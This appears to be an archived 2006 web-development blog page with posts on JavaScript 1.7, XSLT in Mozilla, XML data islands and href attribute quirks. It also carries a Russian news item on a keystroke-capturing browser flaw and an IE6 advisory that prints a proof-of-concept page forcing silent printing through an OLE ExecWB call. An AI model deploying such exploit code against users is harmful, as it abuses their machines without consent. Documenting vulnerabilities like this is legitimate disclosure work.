Home
LoginMouse wheel programming in JavaScript. It really works!
Tested in: Internet Explorer 6, Firefox 0.8-1.5, Netscape 7.1 and Opera 9.
http://www.duggmirror.com/programming/Mouse_wheel_programming_in_JavaScript/
Август 29th, 2006
Posts filed under 'Web'
JavaScript 1.7
JavaScript 1.7 is a language update introducing several new features, in particular generators, iterators, array comprehensions, let expressions, and destructuring assignment. It also includes all the features of JavaScript 1.6.
more…
Июль 24th, 2006
The XSLT/JavaScript Interface In Gecko
With modern browsers supporting XSLT, developers can now use JavaScript to access the power that XSLT provides. JavaScript can enable a web application to load XML data, process it via XSLT into a presentable form and then add it into an existing document. Since the XML data loaded only contains the raw information without any presentation data, it can load quickly even on dialup.
XSLT allows the author to directly manipulate the structure of a document. For example, it permits the rearranging and sorting of elements; it also provides more fine-grained control of the resulting document’s structure.
As of Mozilla 1.2, Gecko enables JavaScript to create XSLT processors. This article covers XSLT/JavaScript bindings in Gecko. They are not available in Netscape 7.0x.
Июль 3rd, 2006
XSLT differences
Mozilla supports XSL Transformations (XSLT) 1.0. It also allows JavaScript to perform XSLT transformations and allows running XPATH on a document.
Mozilla requires that you send the XML and XSLT file holding the stylesheet with an XML mimetype (text/xml or application/xml). This is the most common reason why XSLT won’t run in Mozilla but will in Internet Explorer. Mozilla is strict in that way.
Internet Explorer 5.0 and 5.5 supported XSLT’s working draft, which is substantially different than the final 1.0 recommendation. The easiest way to distinguish what version an XSLT file was written against is to look at the namespace. The namespace for the 1.0 recommendation is http://www.w3.org/1999/XSL/Transform, while the working draft’s namespace is http://www.w3.org/TR/WD-xsl. Internet Explorer 6 supports the working draft for backwards compatibility, but Mozilla does not support the working draft, only the final recommendation.
If XSLT requires you to distinguish the browser, you can query the “xsl:vendor” system property. Mozilla’s XSLT engine will report itself as “Transformiix” and Internet Explorer will return “Microsoft.”
<xsl:if test=\"system-property('xsl:vendor') = 'Transformiix'\">
<!-- Mozilla specific markup -->
</xsl:if>
<xsl:if test=\"system-property('xsl:vendor') = 'Microsoft'\">
<!-- Internet Explorer specific markup -->
</xsl:if>
Июль 3rd, 2006
XML data islands
Internet Explorer has a nonstandard feature called XML data islands, which allow you to embed XML inside an HTML document using the nonstandard HTML tag <xml>. Mozilla does not support XML data islands and handles them as unknown HTML tags. You can achieve the same functionality using XHTML; however, because Internet Explorer’s support for XHTML is weak, this is usually not an option.
One cross-browser solution is to use DOM parsers, which parse a string that contains a serialized XML document and generates the document for the parsed XML. Mozilla uses the DOMParser class, which takes the serialized string and creates an XML document out of it. In Internet Explorer, you can achieve the same functionality using ActiveX. A new Microsoft.XMLDOM generates and has a loadXML method that can take in a string and generate a document from it. The following code shows you how:
<xml id=\"xmldataisland\">
<foo>bar</foo>
</xml>
Cross-browser solution:
var xmlString = '<xml id=\"xmldataisland\"><foo>bar</foo></xml>';
var myDocument;
if (document.implementation.createDocument){
// Mozilla, create a new DOMParser
var parser = new DOMParser();
myDocument = parser.parseFromString(xmlString, 'text/xml');
} else if (window.ActiveXObject){
// Internet Explorer, create a new XML document using ActiveX
// and use loadXML as a DOM parser.
myDocument = new ActiveXObject('Microsoft.XMLDOM')
myDocument.async='false';
myDocument.loadXML(xmlString);
}
Июль 2nd, 2006
.getAttribute(”href”) bug
Whilst working on the Ajax Link Tracker and MapSurface I have come across an inconsistency in how the href attribute is retrieved using DOM Scripting.
The href attribute is different to other element attributes in that the value set can be relative to the context of the page URL. If you set a link with a relative href attribute
<a href=”../development/test1.html”>test page</a>
The browser will look at the pages current URL and derive an absolute URL for the link.
http://www.glenn.jones.net/development/test1.html
This is the root of the problem, some browsers return the text of the attribute and others return the derived absolute URL. The results also differ by the method you use to retrieve the href attribute. There are three common ways to access an attribute:
linkobj.href;
linkobj[‘href’];
linkobj.getAttribute(‘href’);
The linkobj.href and linkobj[‘href’]; methods of accessing the attribute consistently return the derived absolute URL.
Microsoft has tried to address this by problem adding a second parameter to the getAttribute method. The second parameter can be set to 0,1 or 2. If the parameter is set to 2 the method returns the attribute text. Any other setting will return the derived absolute URL.
linkobj.getAttribute(‘href’);
linkobj.getAttribute(‘href’,2);
Get attribute test page Test on IE6, Firefox 1.5 and Opera 8.51.
Июнь 16th, 2006
Во всех распространенных браузерах найдена уязвимость
Сразу несколько компаний, специализирующихся на вопросах компьютерной
безопасности, сообщили об обнаружении уязвимости во всех распространенных
браузерах.
Дыра, о которой идет речь, как
отмечает http://www.techweb.com/showArticle.jhtml?articleID=188702202 Techweb,
теоретически позволяет злоумышленникам получить несанкционированный
доступ к конфиденциальным пользовательским данным, например, информации о
банковских аккаунтах или паролям. Проблема связана с функцией JavaScript
“OnKeyDown” и обеспечивает возможность перехвата строк, введённых
пользователем с клавиатуры в форму на веб-странице.
По информации датской компании Secunia, брешь присутствует в браузерах
Internet Explorer версии 6.х и более ранних модификациях, Firefox версий 1.х,
Netscape 8.х и более ранних модификациях, Mozilla версий до 1.7.х и пакете
SeaMonkey 1.х и ниже. Ситуация ухудшается ещё и тем, что проблема не зависит
от используемой на компьютере операционной системы - нападение может быть
осуществлено на машины, работающие под управлением Windows, Linux и Mac OS
X.
Патча для дыры в настоящее время не существует. Впрочем, нужно отметить, что
организовать атаку на компьютер через данную брешь можно только при условии
выполнения определённых действий потенциальной жертвой. Поэтому компания
Secunia охарактеризовала брешь малоопасной. С примером программного кода,
позволяющего задействовать уязвимость, можно ознакомиться
здесь http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046610.html
Add comment Июнь 13th, 2006
Internet Explorer Print without Prompting
Vulnerable Systems:
* Internet Explorer version 6
Using an OLE object, JavaScript, and HTML, IE 6 will allow a malicious document to send pages to the printer without prompting the user. An example page that exploits the vulnerability is given below. The offending line must be commented out in order for the page to work, so are any linebreaks that break the JavaScript code.
<html>
<head>
<script language="JavaScript">
function ieExecWB( intOLEcmd, intOLEparam )
{
// Create OLE Object
var WebBrowser = '<object ID="WebBrowser1" WIDTH=0 HEIGHT=0
CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></object>';
// Place Object on page
document.body.insertAdjacentHTML('beforeEnd', WebBrowser);
// if intOLEparam is not defined, set it
if ( ( ! intOLEparam ) || ( intOLEparam < -1 ) || ( intOLEparam > 1) )
intOLEparam = 1;
// Execute Object
WebBrowser1.ExecWB( intOLEcmd, intOLEparam );
// Destroy Object
WebBrowser1.outerHTML = "";
}
function printAll()
{
// Uncomment this to enable the exploit!
//ieExecWB(6,-1);
}
</script>
</head>
<body onload="printAll()">
<h4>I like your PRINTER</h3>
</body>
</html>
Add comment Июнь 13th, 2006